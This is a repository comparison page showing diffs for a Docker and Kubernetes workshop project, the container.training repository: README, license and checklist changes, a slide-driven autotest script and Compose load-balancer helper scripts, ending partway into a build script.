Compare commits
3 Commits
gitpod
...
2017-05-08
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
d8d4148870 | ||
|
|
997f4dbaa0 | ||
|
|
a65cc3047a |
24
.gitignore
vendored
@@ -1,24 +1,8 @@
|
||||
*.pyc
|
||||
*.swp
|
||||
*~
|
||||
prepare-vms/ips.txt
|
||||
prepare-vms/ips.html
|
||||
prepare-vms/ips.pdf
|
||||
prepare-vms/settings.yaml
|
||||
prepare-vms/tags
|
||||
prepare-vms/infra
|
||||
prepare-vms/www
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
# General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Windows ###
|
||||
# Windows thumbnail cache files
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
ehthumbs_vista.db
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
image: jpetazzo/shpod
|
||||
24
CHECKLIST.md
@@ -1,24 +0,0 @@
|
||||
Checklist to use when delivering a workshop
|
||||
Authored by Jérôme; additions by Bridget
|
||||
|
||||
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
|
||||
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
|
||||
- [ ] Push local branch to GitHub and merge into main repo
|
||||
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
|
||||
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
|
||||
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
|
||||
- [ ] (optional) Create chatroom
|
||||
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
|
||||
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] How many VMs do we need? Check with event organizers ahead of time
|
||||
- [ ] Provision VMs (slightly more than we think we'll need)
|
||||
- [ ] Change password on presenter's VMs (to forestall any hijinx)
|
||||
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
|
||||
- [ ] Print cards
|
||||
- [ ] Cut cards
|
||||
- [ ] Last-minute merge from master
|
||||
- [ ] Check that all looks good
|
||||
- [ ] DELIVER!
|
||||
- [ ] Shut down VMs
|
||||
- [ ] Update index.html to remove chat link and move session to past things
|
||||
19
LICENSE
@@ -1,12 +1,13 @@
|
||||
The code in this repository is licensed under the Apache License
|
||||
Version 2.0. You may obtain a copy of this license at:
|
||||
Copyright 2015 Jérôme Petazzoni
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
The instructions and slides in this repository (e.g. the files
|
||||
with extension .md and .yml in the "slides" subdirectory) are
|
||||
under the Creative Commons Attribution 4.0 International Public
|
||||
License. You may obtain a copy of this license at:
|
||||
|
||||
https://creativecommons.org/licenses/by/4.0/legalcode
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
||||
|
||||
297
README.md
@@ -1,134 +1,137 @@
|
||||
# Container Training
|
||||
# Docker Orchestration Workshop
|
||||
|
||||
This repository (formerly known as `orchestration-workshop`)
|
||||
contains materials (slides, scripts, demo app, and other
|
||||
code samples) used for various workshops, tutorials, and
|
||||
training sessions around the themes of Docker, containers,
|
||||
and orchestration.
|
||||
|
||||
For the moment, it includes:
|
||||
|
||||
- Introduction to Docker and Containers,
|
||||
- Container Orchestration with Docker Swarm,
|
||||
- Container Orchestration with Kubernetes.
|
||||
|
||||
These materials have been designed around the following
|
||||
principles:
|
||||
|
||||
- they assume very little prior knowledge of Docker,
|
||||
containers, or a particular programming language;
|
||||
- they can be used in a classroom setup (with an
|
||||
instructor), or self-paced at home;
|
||||
- they are hands-on, meaning that they contain lots
|
||||
of examples and exercises that you can easily
|
||||
reproduce;
|
||||
- they progressively introduce concepts in chapters
|
||||
that build on top of each other.
|
||||
|
||||
If you're looking for the materials, you can stop reading
|
||||
right now, and hop to http://container.training/, which
|
||||
hosts all the slides decks available.
|
||||
|
||||
The rest of this document explains how this repository
|
||||
is structured, and how to use it to deliver (or create)
|
||||
your own tutorials.
|
||||
This is the material (slides, scripts, demo app, and other
|
||||
code samples) for the "Docker orchestration workshop"
|
||||
written and delivered by Jérôme Petazzoni (and lots of others)
|
||||
non-stop since June 2015.
|
||||
|
||||
|
||||
## Why a single repository?
|
||||
## Content
|
||||
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
- a [semi-automated test harness](slides/autopilot/) to check
|
||||
that the exercises and examples provided work properly;
|
||||
- a [PhantomJS script](slides/slidechecker.js) to check
|
||||
that the slides look good and don't have formatting issues;
|
||||
- [deployment scripts](prepare-vms/) to start training
|
||||
VMs in bulk;
|
||||
- a fancy pipeline powered by
|
||||
[Netlify](https://www.netlify.com/) and continuously
|
||||
deploying `master` to http://container.training/.
|
||||
- Chapter 1: Getting Started: running apps with docker-compose
|
||||
- Chapter 2: Scaling out with Swarm Mode
|
||||
- Chapter 3: Operating the Swarm (networks, updates, logging, metrics)
|
||||
- Chapter 4: Deeper in Swarm (stateful services, scripting, DAB's)
|
||||
|
||||
|
||||
## What are the different courses available?
|
||||
## Quick start (or, "I want to try it!")
|
||||
|
||||
**Introduction to Docker** is derived from the first
|
||||
"Docker Fundamentals" training materials. For more information,
|
||||
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
|
||||
The version in this repository has been adapted to the Markdown
|
||||
publishing pipeline. It is still maintained, but only receives
|
||||
minor updates once in a while.
|
||||
This workshop is designed to be *hands on*, i.e. to give you a step-by-step
|
||||
guide where you will build your own Docker cluster, and use it to deploy
|
||||
a sample application.
|
||||
|
||||
**Container Orchestration with Docker Swarm** (formerly
|
||||
known as "Orchestration Workshop") is a workshop created by Jérôme
|
||||
Petazzoni in June 2015. Since then, it has been continuously updated
|
||||
and improved, and received contributions from many others authors.
|
||||
It is actively maintained.
|
||||
The easiest way to follow the workshop is to attend it when it is delivered
|
||||
by an instructor. In that case, the instructor will generally give you
|
||||
credentials (IP addresses, login, password) to connect to your own cluster
|
||||
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
|
||||
assume that you have your own cluster indeed.
|
||||
|
||||
**Container Orchestration with Kubernetes** was created by
|
||||
Jérôme Petazzoni in October 2017, with help and feedback from
|
||||
a few other contributors. It is actively maintained.
|
||||
If you want to follow the workshop on your own, and want to have your
|
||||
own cluster, we have multiple solutions for you!
|
||||
|
||||
|
||||
## Repository structure
|
||||
### Using [play-with-docker](http://play-with-docker.com/)
|
||||
|
||||
- [bin](bin/)
|
||||
- A few helper scripts that you can safely ignore for now.
|
||||
- [dockercoins](dockercoins/)
|
||||
- The demo app used throughout the orchestration workshops.
|
||||
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
|
||||
- Logging and metrics stacks used in the later parts of
|
||||
the orchestration workshops.
|
||||
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
|
||||
- Contributed scripts to automate the creation of local environments.
|
||||
These could use some help to test/check that they work.
|
||||
- [prepare-vms](prepare-vms/):
|
||||
- Scripts to automate the creation of AWS instances for students.
|
||||
These are routinely used and actively maintained.
|
||||
- [slides](slides/):
|
||||
- All the slides! They are assembled from Markdown files with
|
||||
a custom Python script, and then rendered using [gnab/remark](
|
||||
https://github.com/gnab/remark). Check this directory for more details.
|
||||
- [stacks](stacks/):
|
||||
- A handful of Compose files (version 3) allowing to easily
|
||||
deploy complex application stacks.
|
||||
This method is very easy to get started (you don't need any extra account
|
||||
or resources!) but will require a bit of adaptation from the workshop slides.
|
||||
|
||||
To get started, go to [play-with-docker](http://play-with-docker.com/), and
|
||||
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
|
||||
containers, all on a private network. These are your five nodes for the workshop!
|
||||
|
||||
When the instructions in the slides tell you to "SSH on node X", just go to
|
||||
the tab corresponding to that node.
|
||||
|
||||
The nodes are not directly reachable from outside; so when the slides tell
|
||||
you to "connect to the IP address of your node on port XYZ" you will have
|
||||
to use a different method.
|
||||
|
||||
We suggest to use "supergrok", a container offering a NGINX+ngrok combo to
|
||||
expose your services. To use it, just start (on any of your nodes) the
|
||||
`jpetazzo/supergrok` image. The image will output further instructions:
|
||||
|
||||
```
|
||||
docker run --name supergrok -d jpetazzo/supergrok
|
||||
docker logs --follow supergrok
|
||||
```
|
||||
|
||||
The logs of the container will give you a tunnel address and explain you
|
||||
how to connected to exposed services. That's all you need to do!
|
||||
|
||||
We are also working on a native proxy, embedded to Play-With-Docker.
|
||||
Stay tuned!
|
||||
|
||||
<!--
|
||||
|
||||
- You can use a proxy provided by Play-With-Docker. When the slides
|
||||
instruct you to connect to nodeX on port ABC, instead, you will connect
|
||||
to http://play-with-docker.com/XXX.XXX.XXX.XXX:ABC, where XXX.XXX.XXX.XXX
|
||||
is the IP address of nodeX.
|
||||
|
||||
-->
|
||||
|
||||
Note that the instances provided by Play-With-Docker have a short lifespan
|
||||
(a few hours only), so if you want to do the workshop over multiple sessions,
|
||||
you will have to start over each time ... Or create your own cluster with
|
||||
one of the methods described below.
|
||||
|
||||
|
||||
## Course structure
|
||||
### Using Docker Machine to create your own cluster
|
||||
|
||||
(This applies only for the orchestration workshops.)
|
||||
This method requires a bit more work to get started, but you get a permanent
|
||||
cluster, with less limitations.
|
||||
|
||||
The workshop introduces a demo app, "DockerCoins," built
|
||||
around a micro-services architecture. First, we run it
|
||||
on a single node, using Docker Compose. Then, we pretend
|
||||
that we need to scale it, and we use an orchestrator
|
||||
(SwarmKit or Kubernetes) to deploy and scale the app on
|
||||
a cluster.
|
||||
You will need Docker Machine (if you have Docker Mac, Docker Windows, or
|
||||
the Docker Toolbox, you're all set already). You will also need:
|
||||
|
||||
We explain the concepts of the orchestrator. For SwarmKit,
|
||||
we setup the cluster with `docker swarm init` and `docker swarm join`.
|
||||
For Kubernetes, we use pre-configured clusters.
|
||||
- credentials for a cloud provider (e.g. API keys or tokens),
|
||||
- or a local install of VirtualBox or VMware (or anything supported
|
||||
by Docker Machine).
|
||||
|
||||
Then, we cover more advanced concepts: scaling, load balancing,
|
||||
updates, global services or daemon sets.
|
||||
|
||||
There are a number of advanced optional chapters about
|
||||
logging, metrics, secrets, network encryption, etc.
|
||||
|
||||
The content is very modular: it is broken down in a large
|
||||
number of Markdown files, that are put together according
|
||||
to a YAML manifest. This allows to re-use content
|
||||
between different workshops very easily.
|
||||
Full instructions are in the [prepare-machine](prepare-machine) subdirectory.
|
||||
|
||||
|
||||
### DockerCoins
|
||||
### Using our scripts to mass-create a bunch of clusters
|
||||
|
||||
The sample app is in the `dockercoins` directory.
|
||||
It's used during all chapters
|
||||
Since we often deliver the workshop during conferences or similar events,
|
||||
we have scripts to automate the creation of a bunch of clusters using
|
||||
AWS EC2. If you want to create multiple clusters and have EC2 credits,
|
||||
check the [prepare-vms](prepare-vms) directory for more information.
|
||||
|
||||
|
||||
## How This Repo is Organized
|
||||
|
||||
- **dockercoins**
|
||||
- Sample App: compose files and source code for the dockercoins sample apps
|
||||
used throughout the workshop
|
||||
- **docs**
|
||||
- Slide Deck: presentation slide deck, works out-of-box with GitHub Pages,
|
||||
uses https://remarkjs.com
|
||||
- **prepare-local**
|
||||
- untested scripts for automating the creation of local virtualbox VM's
|
||||
(could use your help validating)
|
||||
- **prepare-machine**
|
||||
- instructions explaining how to use Docker Machine to create VMs
|
||||
- **prepare-vms**
|
||||
- scripts for automating the creation of AWS instances for students
|
||||
|
||||
|
||||
## Slide Deck
|
||||
|
||||
- The slides are in the `docs` directory.
|
||||
- To view them locally open `docs/index.html` in your browser. It works
|
||||
offline too.
|
||||
- To view them online open https://jpetazzo.github.io/orchestration-workshop/
|
||||
in your browser.
|
||||
- When you fork this repo, be sure GitHub Pages is enabled in repo Settings
|
||||
for "master branch /docs folder" and you'll have your own website for them.
|
||||
- They use https://remarkjs.com to allow simple markdown in a html file that
|
||||
remark will transform into a presentation in the browser.
|
||||
|
||||
|
||||
## Sample App: Dockercoins!
|
||||
|
||||
The sample app is in the `dockercoins` directory. It's used during all chapters
|
||||
for explaining different concepts of orchestration.
|
||||
|
||||
To see it in action:
|
||||
@@ -138,18 +141,13 @@ To see it in action:
|
||||
- the web UI will be available on port 8000
|
||||
|
||||
|
||||
*If you just want to run the workshop for yourself, you can stop reading
|
||||
here. If you want to deliver the workshop for others (i.e. if you
|
||||
want to become an instructor), keep reading!*
|
||||
|
||||
|
||||
## Running the Workshop
|
||||
|
||||
If you want to deliver one of these workshops yourself,
|
||||
this section is for you!
|
||||
|
||||
> *This section has been mostly contributed by
|
||||
> [Bret Fisher](https://twitter.com/bretfisher), who was
|
||||
> one of the first persons to have the bravery of delivering
|
||||
> this workshop without me. Thanks Bret! 🍻
|
||||
>
|
||||
> Jérôme.*
|
||||
|
||||
|
||||
### General timeline of planning a workshop
|
||||
|
||||
@@ -157,7 +155,7 @@ this section is for you!
|
||||
understand the different `dockercoins` repo's and the steps we go through to
|
||||
get to a full Swarm Mode cluster of many containers. You'll update the first
|
||||
few slides and last slide at a minimum, with your info.
|
||||
- ~~Your docs directory can use GitHub Pages.~~
|
||||
- Your docs directory can use GitHub Pages.
|
||||
- This workshop expects 5 servers per student. You can get away with as little
|
||||
as 2 servers per student, but you'll need to change the slide deck to
|
||||
accommodate. More servers = more fun.
|
||||
@@ -183,14 +181,13 @@ this section is for you!
|
||||
they need for class.
|
||||
- Typically you create the servers the day before or morning of workshop, and
|
||||
leave them up the rest of day after workshop. If creating hundreds of servers,
|
||||
you'll likely want to run all these `workshopctl` commands from a dedicated
|
||||
you'll likely want to run all these `trainer` commands from a dedicated
|
||||
instance you have in same region as instances you want to create. Much faster
|
||||
this way if you're on poor internet. Also, create 2 sets of servers for
|
||||
yourself, and use one during workshop and the 2nd is a backup.
|
||||
- Remember you'll need to print the "cards" for students, so you'll need to
|
||||
create instances while you have a way to print them.
|
||||
|
||||
|
||||
### Things That Could Go Wrong
|
||||
|
||||
- Creating AWS instances ahead of time, and you hit its limits in region and
|
||||
@@ -199,20 +196,18 @@ this section is for you!
|
||||
locked-down computer, host firewall, etc.
|
||||
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
|
||||
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
|
||||
prevent you from losing your place if you get disconnected from servers.
|
||||
prevent you from loosing your place if you get disconnected from servers.
|
||||
https://tmux.github.io
|
||||
- Forget to print "cards" and cut them up for handing out IP's.
|
||||
- Forget to have fun and focus on your students!
|
||||
|
||||
|
||||
### Creating the VMs
|
||||
|
||||
`prepare-vms/workshopctl` is the script that gets you most of what you need for
|
||||
`prepare-vms/trainer` is the script that gets you most of what you need for
|
||||
setting up instances. See
|
||||
[prepare-vms/README.md](prepare-vms)
|
||||
for all the info on tools and scripts.
|
||||
|
||||
|
||||
### Content for Different Workshop Durations
|
||||
|
||||
With all the slides, this workshop is a full day long. If you need to deliver
|
||||
@@ -221,7 +216,6 @@ can replace `---` with `???` which will hide slides. Or leave them there and
|
||||
add something like `(EXTRA CREDIT)` to title so students can still view the
|
||||
content but you also know to skip during presentation.
|
||||
|
||||
|
||||
#### 3 Hour Version
|
||||
|
||||
- Limit time on debug tools, maybe skip a few. *"Chapter 1:
|
||||
@@ -233,7 +227,6 @@ content but you also know to skip during presentation.
|
||||
- Mention what DAB's are, but make this part optional in case you run out
|
||||
of time
|
||||
|
||||
|
||||
#### 2 Hour Version
|
||||
|
||||
- Skip all the above, and:
|
||||
@@ -247,17 +240,6 @@ content but you also know to skip during presentation.
|
||||
- Last 15-30 minutes is for stateful services, DAB files, and questions.
|
||||
|
||||
|
||||
### Pre-built images
|
||||
|
||||
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
|
||||
|
||||
There are also three variants, for demo purposes:
|
||||
|
||||
- `dockercoins/rng:v0.2` is broken (the server won't even start),
|
||||
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
|
||||
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
|
||||
|
||||
|
||||
## Past events
|
||||
|
||||
Since its inception, this workshop has been delivered dozens of times,
|
||||
@@ -289,34 +271,13 @@ If there is a bug and you can't fix it, but you can
|
||||
reproduce it: submit an issue explaining how to reproduce.
|
||||
|
||||
If there is a bug and you can't even reproduce it:
|
||||
sorry. It is probably an Heisenbug. We can't act on it
|
||||
until it's reproducible, alas.
|
||||
sorry. It is probably an Heisenbug. I can't act on it
|
||||
until it's reproducible.
|
||||
|
||||
if you have attended this workshop and have feedback,
|
||||
or if you want us to deliver that workshop at your
|
||||
conference or for your company: contact me (jerome
|
||||
at docker dot com).
|
||||
|
||||
# “Please teach us!”
|
||||
|
||||
If you have attended one of these workshops, and want
|
||||
your team or organization to attend a similar one, you
|
||||
can look at the list of upcoming events on
|
||||
http://container.training/.
|
||||
|
||||
You are also welcome to reuse these materials to run
|
||||
your own workshop, for your team or even at a meetup
|
||||
or conference. In that case, you might enjoy watching
|
||||
[Bridget Kromhout's talk at KubeCon 2018 Europe](
|
||||
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
|
||||
precisely how to run such a workshop yourself.
|
||||
|
||||
Finally, you can also contact the following persons,
|
||||
who are experienced speakers, are familiar with the
|
||||
material, and are available to deliver these workshops
|
||||
at your conference or for your company:
|
||||
|
||||
- jerome dot petazzoni at gmail dot com
|
||||
- bret at bretfisher dot com
|
||||
|
||||
(If you are willing and able to deliver such workshops,
|
||||
feel free to submit a PR to add your name to that list!)
|
||||
|
||||
**Thank you!**
|
||||
Thank you!
|
||||
|
||||
|
||||
191
autotest/autotest.py
Executable file
@@ -0,0 +1,191 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import re
|
||||
import signal
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
def print_snippet(snippet):
|
||||
print(78*'-')
|
||||
print(snippet)
|
||||
print(78*'-')
|
||||
|
||||
class Snippet(object):
|
||||
|
||||
def __init__(self, slide, content):
|
||||
self.slide = slide
|
||||
self.content = content
|
||||
self.actions = []
|
||||
|
||||
def __str__(self):
|
||||
return self.content
|
||||
|
||||
|
||||
class Slide(object):
|
||||
|
||||
current_slide = 0
|
||||
|
||||
def __init__(self, content):
|
||||
Slide.current_slide += 1
|
||||
self.number = Slide.current_slide
|
||||
# Remove commented-out slides
|
||||
# (remark.js considers ??? to be the separator for speaker notes)
|
||||
content = re.split("\n\?\?\?\n", content)[0]
|
||||
self.content = content
|
||||
self.snippets = []
|
||||
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
|
||||
for exercise in exercises:
|
||||
if "```" in exercise and "<br/>`" in exercise:
|
||||
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
print_snippet(exercise)
|
||||
elif "```" in exercise:
|
||||
for snippet in exercise.split("```")[1::2]:
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
elif "<br/>`" in exercise:
|
||||
for snippet in re.findall("<br/>`(.*)`", exercise):
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
else:
|
||||
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
|
||||
def __str__(self):
|
||||
text = self.content
|
||||
for snippet in self.snippets:
|
||||
text = text.replace(snippet.content, ansi("7")(snippet.content))
|
||||
return text
|
||||
|
||||
|
||||
def ansi(code):
|
||||
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
|
||||
|
||||
slides = []
|
||||
with open("index.html") as f:
|
||||
content = f.read()
|
||||
for slide in re.split("\n---?\n", content):
|
||||
slides.append(Slide(slide))
|
||||
|
||||
is_editing_file = False
|
||||
placeholders = {}
|
||||
for slide in slides:
|
||||
for snippet in slide.snippets:
|
||||
content = snippet.content
|
||||
# Multi-line snippets should be ```highlightsyntax...
|
||||
# Single-line snippets will be interpreted as shell commands
|
||||
if '\n' in content:
|
||||
highlight, content = content.split('\n', 1)
|
||||
else:
|
||||
highlight = "bash"
|
||||
content = content.strip()
|
||||
# If the previous snippet was a file fragment, and the current
|
||||
# snippet is not YAML or EDIT, complain.
|
||||
if is_editing_file and highlight not in ["yaml", "edit"]:
|
||||
print("! On slide {}, previous snippet was YAML, so what do what do?"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
is_editing_file = False
|
||||
if highlight == "yaml":
|
||||
is_editing_file = True
|
||||
elif highlight == "placeholder":
|
||||
for line in content.split('\n'):
|
||||
variable, value = line.split(' ', 1)
|
||||
placeholders[variable] = value
|
||||
elif highlight == "bash":
|
||||
for variable, value in placeholders.items():
|
||||
quoted = "`{}`".format(variable)
|
||||
if quoted in content:
|
||||
content = content.replace(quoted, value)
|
||||
del placeholders[variable]
|
||||
if '`' in content:
|
||||
print("! The following snippet on slide {} contains a backtick:"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
continue
|
||||
print("_ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "edit":
|
||||
print(". "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "meta":
|
||||
print("^ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
else:
|
||||
print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
|
||||
if placeholders:
|
||||
print("! Remaining placeholder values: {}".format(placeholders))
|
||||
|
||||
actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])
|
||||
|
||||
# Strip ^{ ... ^} for now
|
||||
def strip_curly_braces(actions, in_braces=False):
|
||||
if actions == []:
|
||||
return []
|
||||
elif actions[0] == ("meta", "^{"):
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
elif actions[0] == ("meta", "^}"):
|
||||
return strip_curly_braces(actions[1:], False)
|
||||
elif in_braces:
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
else:
|
||||
return [actions[0]] + strip_curly_braces(actions[1:], False)
|
||||
|
||||
actions = strip_curly_braces(actions)
|
||||
|
||||
background = []
|
||||
cwd = os.path.expanduser("~")
|
||||
env = {}
|
||||
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
|
||||
if current_action[0] == "meta":
|
||||
continue
|
||||
print(ansi(7)(">>> {}".format(current_action[1])))
|
||||
time.sleep(1)
|
||||
popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
|
||||
# The follow hack allows to capture the environment variables set by `docker-machine env`
|
||||
# FIXME: this doesn't handle `unset` for now
|
||||
if any([
|
||||
"eval $(docker-machine env" in current_action[1],
|
||||
"DOCKER_HOST" in current_action[1],
|
||||
"COMPOSE_FILE" in current_action[1],
|
||||
]):
|
||||
popen_options["stdout"] = subprocess.PIPE
|
||||
current_action[1] += "\nenv"
|
||||
proc = subprocess.Popen(current_action[1], **popen_options)
|
||||
proc.cmd = current_action[1]
|
||||
if next_action[0] == "meta":
|
||||
print(">>> {}".format(next_action[1]))
|
||||
time.sleep(3)
|
||||
if next_action[1] == "^C":
|
||||
os.killpg(proc.pid, signal.SIGINT)
|
||||
proc.wait()
|
||||
elif next_action[1] == "^Z":
|
||||
# Let the process run
|
||||
background.append(proc)
|
||||
elif next_action[1] == "^D":
|
||||
proc.communicate()
|
||||
proc.wait()
|
||||
else:
|
||||
print("! Unknown meta action {} after snippet:".format(next_action[1]))
|
||||
print_snippet(next_action[1])
|
||||
print(ansi(7)("<<< {}".format(current_action[1])))
|
||||
else:
|
||||
proc.wait()
|
||||
if "stdout" in popen_options:
|
||||
stdout, stderr = proc.communicate()
|
||||
for line in stdout.split('\n'):
|
||||
if line.startswith("DOCKER_"):
|
||||
variable, value = line.split('=', 1)
|
||||
env[variable] = value
|
||||
print("=== {}={}".format(variable, value))
|
||||
print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
|
||||
if proc.returncode != 0:
|
||||
print("Got non-zero status code; aborting.")
|
||||
break
|
||||
if current_action[1].startswith("cd "):
|
||||
cwd = os.path.expanduser(current_action[1][3:])
|
||||
for proc in background:
|
||||
print("Terminating background process:")
|
||||
print_snippet(proc.cmd)
|
||||
proc.terminate()
|
||||
proc.wait()
|
||||
|
||||
1
autotest/index.html
Symbolic link
@@ -0,0 +1 @@
|
||||
../www/htdocs/index.html
|
||||
42
bin/add-load-balancer-v1.py
Executable file
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
# arg 1 = service name
|
||||
# arg 2 = number of instances
|
||||
|
||||
service_name = sys.argv[1]
|
||||
desired_instances = int(sys.argv[2])
|
||||
|
||||
compose_file = os.environ["COMPOSE_FILE"]
|
||||
input_file, output_file = compose_file, compose_file
|
||||
|
||||
config = yaml.load(open(input_file))
|
||||
|
||||
# The ambassadors need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
port = str(ports[service_name])
|
||||
|
||||
command_line = port
|
||||
|
||||
depends_on = []
|
||||
|
||||
for n in range(1, 1+desired_instances):
|
||||
config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
|
||||
command_line += " {}{}:{}".format(service_name, n, port)
|
||||
depends_on.append("{}{}".format(service_name, n))
|
||||
|
||||
config["services"][service_name] = {
|
||||
"image": "jpetazzo/hamba",
|
||||
"command": command_line,
|
||||
"depends_on": depends_on,
|
||||
}
|
||||
if "networks" in config["services"]["{}1".format(service_name)]:
|
||||
config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]
|
||||
|
||||
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
|
||||
|
||||
87
bin/add-load-balancer-v2.py
Executable file
@@ -0,0 +1,87 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
def error(msg):
|
||||
print("ERROR: {}".format(msg))
|
||||
exit(1)
|
||||
|
||||
# arg 1 = service name
|
||||
|
||||
service_name = sys.argv[1]
|
||||
|
||||
compose_file = os.environ["COMPOSE_FILE"]
|
||||
input_file, output_file = compose_file, compose_file
|
||||
|
||||
config = yaml.load(open(input_file))
|
||||
|
||||
version = config.get("version")
|
||||
if version != "2":
|
||||
error("Unsupported $COMPOSE_FILE version: {!r}".format(version))
|
||||
|
||||
# The load balancers need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
port = str(ports[service_name])
|
||||
|
||||
if service_name not in config["services"]:
|
||||
error("service {} not found in $COMPOSE_FILE"
|
||||
.format(service_name))
|
||||
|
||||
lb_name = "{}-lb".format(service_name)
|
||||
be_name = "{}-be".format(service_name)
|
||||
wd_name = "{}-wd".format(service_name)
|
||||
|
||||
if lb_name in config["services"]:
|
||||
error("load balancer {} already exists in $COMPOSE_FILE"
|
||||
.format(lb_name))
|
||||
|
||||
if wd_name in config["services"]:
|
||||
error("dns watcher {} already exists in $COMPOSE_FILE"
|
||||
.format(wd_name))
|
||||
|
||||
service = config["services"][service_name]
|
||||
if "networks" in service:
|
||||
error("service {} has custom networks"
|
||||
.format(service_name))
|
||||
|
||||
# Put the service on its own network.
|
||||
service["networks"] = {service_name: {"aliases": [ be_name ] } }
|
||||
# Put a label indicating which load balancer is responsible for this service.
|
||||
if "labels" not in service:
|
||||
service["labels"] = {}
|
||||
service["labels"]["loadbalancer"] = lb_name
|
||||
|
||||
# Add the load balancer.
|
||||
config["services"][lb_name] = {
|
||||
"image": "jpetazzo/hamba",
|
||||
"command": "{} {} {}".format(port, be_name, port),
|
||||
"depends_on": [ service_name ],
|
||||
"networks": {
|
||||
"default": {
|
||||
"aliases": [ service_name ],
|
||||
},
|
||||
service_name: None,
|
||||
},
|
||||
}
|
||||
|
||||
# Add the DNS watcher.
|
||||
config["services"][wd_name] = {
|
||||
"image": "jpetazzo/watchdns",
|
||||
"command": "{} {} {}".format(port, be_name, port),
|
||||
"volumes_from": [ lb_name ],
|
||||
"networks": {
|
||||
service_name: None,
|
||||
},
|
||||
}
|
||||
|
||||
if "networks" not in config:
|
||||
config["networks"] = {}
|
||||
if service_name not in config["networks"]:
|
||||
config["networks"][service_name] = None
|
||||
|
||||
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
|
||||
|
||||
63
bin/build-tag-push.py
Executable file
@@ -0,0 +1,63 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile
|
||||
import os
|
||||
